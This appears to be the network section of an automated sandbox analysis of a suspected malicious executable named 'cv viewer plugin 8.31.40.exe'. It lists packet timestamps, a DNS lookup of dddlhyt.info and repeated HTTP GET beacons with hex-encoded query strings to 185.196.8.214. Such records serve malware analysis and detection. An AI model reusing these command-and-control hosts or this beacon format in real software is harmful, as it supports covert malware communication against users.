                                                  Aug 31, 2024 22:14:23.087910891 CEST8049783185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:23.792293072 CEST8049783185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:23.792402029 CEST4978380192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:23.937617064 CEST4978380192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:23.937925100 CEST4978480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:23.942698002 CEST8049784185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:23.942806005 CEST4978480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:23.943135023 CEST8049783185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:23.943186998 CEST4978380192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:23.945274115 CEST4978480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:23.950223923 CEST8049784185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:24.633378029 CEST8049784185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:24.633476019 CEST4978480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:24.753271103 CEST4978480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:24.753650904 CEST4978580192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:24.758487940 CEST8049785185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:24.758559942 CEST4978580192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:24.758738995 CEST4978580192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:24.759155035 CEST8049784185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:24.759203911 CEST4978480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:24.763498068 CEST8049785185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:25.443111897 CEST8049785185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:25.443186998 CEST4978580192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:25.564747095 CEST4978580192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:25.565084934 CEST4978680192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:25.570502996 CEST8049786185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:25.570601940 CEST4978680192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:25.570703983 CEST8049785185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:25.570751905 CEST4978580192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:25.570882082 CEST4978680192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:25.575845003 CEST8049786185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:26.270853996 CEST8049786185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:26.270946980 CEST4978680192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:26.393359900 CEST4978680192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:26.393691063 CEST4978780192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:26.398513079 CEST8049787185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:26.398633003 CEST8049786185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:26.398660898 CEST4978780192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:26.398819923 CEST4978780192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:26.398888111 CEST4978680192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:26.403659105 CEST8049787185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:27.088766098 CEST8049787185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:27.089046955 CEST4978780192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:27.219871044 CEST4978780192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:27.220248938 CEST4978880192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:27.225236893 CEST8049788185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:27.225462914 CEST4978880192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:27.225620985 CEST8049787185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:27.225629091 CEST4978880192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:27.225730896 CEST4978780192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:27.230411053 CEST8049788185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:27.915329933 CEST8049788185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:27.915380001 CEST4978880192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:28.032839060 CEST4978880192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:28.033277988 CEST4978980192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:28.038065910 CEST8049788185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:28.038121939 CEST8049789185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:28.038149118 CEST4978880192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:28.038217068 CEST4978980192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:28.038341999 CEST4978980192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:28.043113947 CEST8049789185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:28.734129906 CEST8049789185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:28.734685898 CEST4978980192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:28.862248898 CEST4978980192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:28.862248898 CEST4979080192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:28.867211103 CEST8049790185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:28.867386103 CEST8049789185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:28.868635893 CEST4978980192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:28.868635893 CEST4979080192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:28.868818045 CEST4979080192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:28.873548031 CEST8049790185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:29.555881977 CEST8049790185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:29.555951118 CEST4979080192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:29.674118042 CEST4979080192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:29.674496889 CEST4979180192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:29.679327965 CEST8049791185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:29.679356098 CEST8049790185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:29.679398060 CEST4979180192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:29.679428101 CEST4979080192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:29.679579973 CEST4979180192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:29.684330940 CEST8049791185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:29.841157913 CEST20234976589.105.201.183192.168.2.9
                                                  Aug 31, 2024 22:14:29.843694925 CEST4979280192.168.2.931.214.157.226
                                                  Aug 31, 2024 22:14:29.848555088 CEST804979231.214.157.226192.168.2.9
                                                  Aug 31, 2024 22:14:29.848632097 CEST4979280192.168.2.931.214.157.226
                                                  Aug 31, 2024 22:14:29.848989964 CEST497932023192.168.2.989.105.201.183
                                                  Aug 31, 2024 22:14:29.854152918 CEST20234979389.105.201.183192.168.2.9
                                                  Aug 31, 2024 22:14:29.854226112 CEST497932023192.168.2.989.105.201.183
                                                  Aug 31, 2024 22:14:29.854301929 CEST497932023192.168.2.989.105.201.183
                                                  Aug 31, 2024 22:14:29.859098911 CEST20234979389.105.201.183192.168.2.9
                                                  Aug 31, 2024 22:14:29.859149933 CEST497932023192.168.2.989.105.201.183
                                                  Aug 31, 2024 22:14:29.864012003 CEST20234979389.105.201.183192.168.2.9
                                                  Aug 31, 2024 22:14:29.886888981 CEST497652023192.168.2.989.105.201.183
                                                  Aug 31, 2024 22:14:30.371910095 CEST8049791185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:30.374753952 CEST4979180192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:30.452843904 CEST20234979389.105.201.183192.168.2.9
                                                  Aug 31, 2024 22:14:30.452990055 CEST4979280192.168.2.931.214.157.226
                                                  Aug 31, 2024 22:14:30.457832098 CEST804979231.214.157.226192.168.2.9
                                                  Aug 31, 2024 22:14:30.496381998 CEST497932023192.168.2.989.105.201.183
                                                  Aug 31, 2024 22:14:30.501924992 CEST4979180192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:30.502423048 CEST4979480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:30.507425070 CEST8049791185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:30.507519007 CEST4979180192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:30.507628918 CEST8049794185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:30.507785082 CEST4979480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:30.508012056 CEST4979480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:30.513582945 CEST8049794185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:30.625307083 CEST804979231.214.157.226192.168.2.9
                                                  Aug 31, 2024 22:14:30.668129921 CEST4979280192.168.2.931.214.157.226
                                                  Aug 31, 2024 22:14:31.176543951 CEST497932023192.168.2.989.105.201.183
                                                  Aug 31, 2024 22:14:31.181724072 CEST20234979389.105.201.183192.168.2.9
                                                  Aug 31, 2024 22:14:31.214618921 CEST8049794185.196.8.214192.168.2.9
                                                  Aug 31, 2024 22:14:31.215466022 CEST4979480192.168.2.9185.196.8.214
                                                  Aug 31, 2024 22:14:31.349718094 CEST20234979389.105.201.183192.168.2.9
                                                  Aug 31, 2024 22:14:31.349822044 CEST497932023192.168.2.989.105.201.183
                                                  Aug 31, 2024 22:14:31.349900961 CEST497932023192.168.2.989.105.201.183
                                                  Aug 31, 2024 22:14:31.349910975 CEST4979280192.168.2.931.214.157.226
                                                  Aug 31, 2024 22:14:31.355366945 CEST20234979389.105.201.183192.168.2.9
                                                  Aug 31, 2024 22:14:31.355593920 CEST804979231.214.157.226192.168.2.9
                                                  Aug 31, 2024 22:14:31.355658054 CEST4979280192.168.2.931.214.157.226
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Aug 31, 2024 22:13:20.301440954 CEST5238053192.168.2.991.211.247.248
                                                  Aug 31, 2024 22:13:20.339195967 CEST535238091.211.247.248192.168.2.9
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Aug 31, 2024 22:13:20.301440954 CEST192.168.2.991.211.247.2480x83eeStandard query (0)dddlhyt.infoA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Aug 31, 2024 22:13:20.339195967 CEST91.211.247.248192.168.2.90x83eeNo error (0)dddlhyt.info185.196.8.214A (IP address)IN (0x0001)false
                                                  • dddlhyt.info
                                                  • 31.214.157.226
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.949720185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:20.378920078 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:21.067531109 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:20 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.949721185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:21.192502975 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:21.881506920 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:21 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.949722185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:22.004890919 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:22.718441010 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:22 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:22.827095032 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:23.068290949 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:22 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.949723185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:23.191839933 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:23.880629063 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:23 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.949724185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:24.012777090 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:24.727519989 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:24 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.949725185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:24.848195076 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:25.567821980 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:25 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.949726185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:25.698786020 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:26.405953884 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.949727185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:26.535720110 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:27.230552912 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:27 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:27.344016075 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:27.579921007 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:27 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  8192.168.2.949728185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:27.708940029 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:28.427604914 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:28 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  9192.168.2.949729185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:28.553647995 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:29.244990110 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.949730185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:29.364491940 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:30.109802961 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:13:30.224756956 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:30.488168955 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:30 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.949731185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:30.613600016 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:31.303558111 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:31 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.949732185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:13:31.427253008 CEST315OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c443db22f31df92d8838ed12a666d307eca743ec4c2b07b529669239628ffc14c2ef92 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:13:32.117953062 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:13:32 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
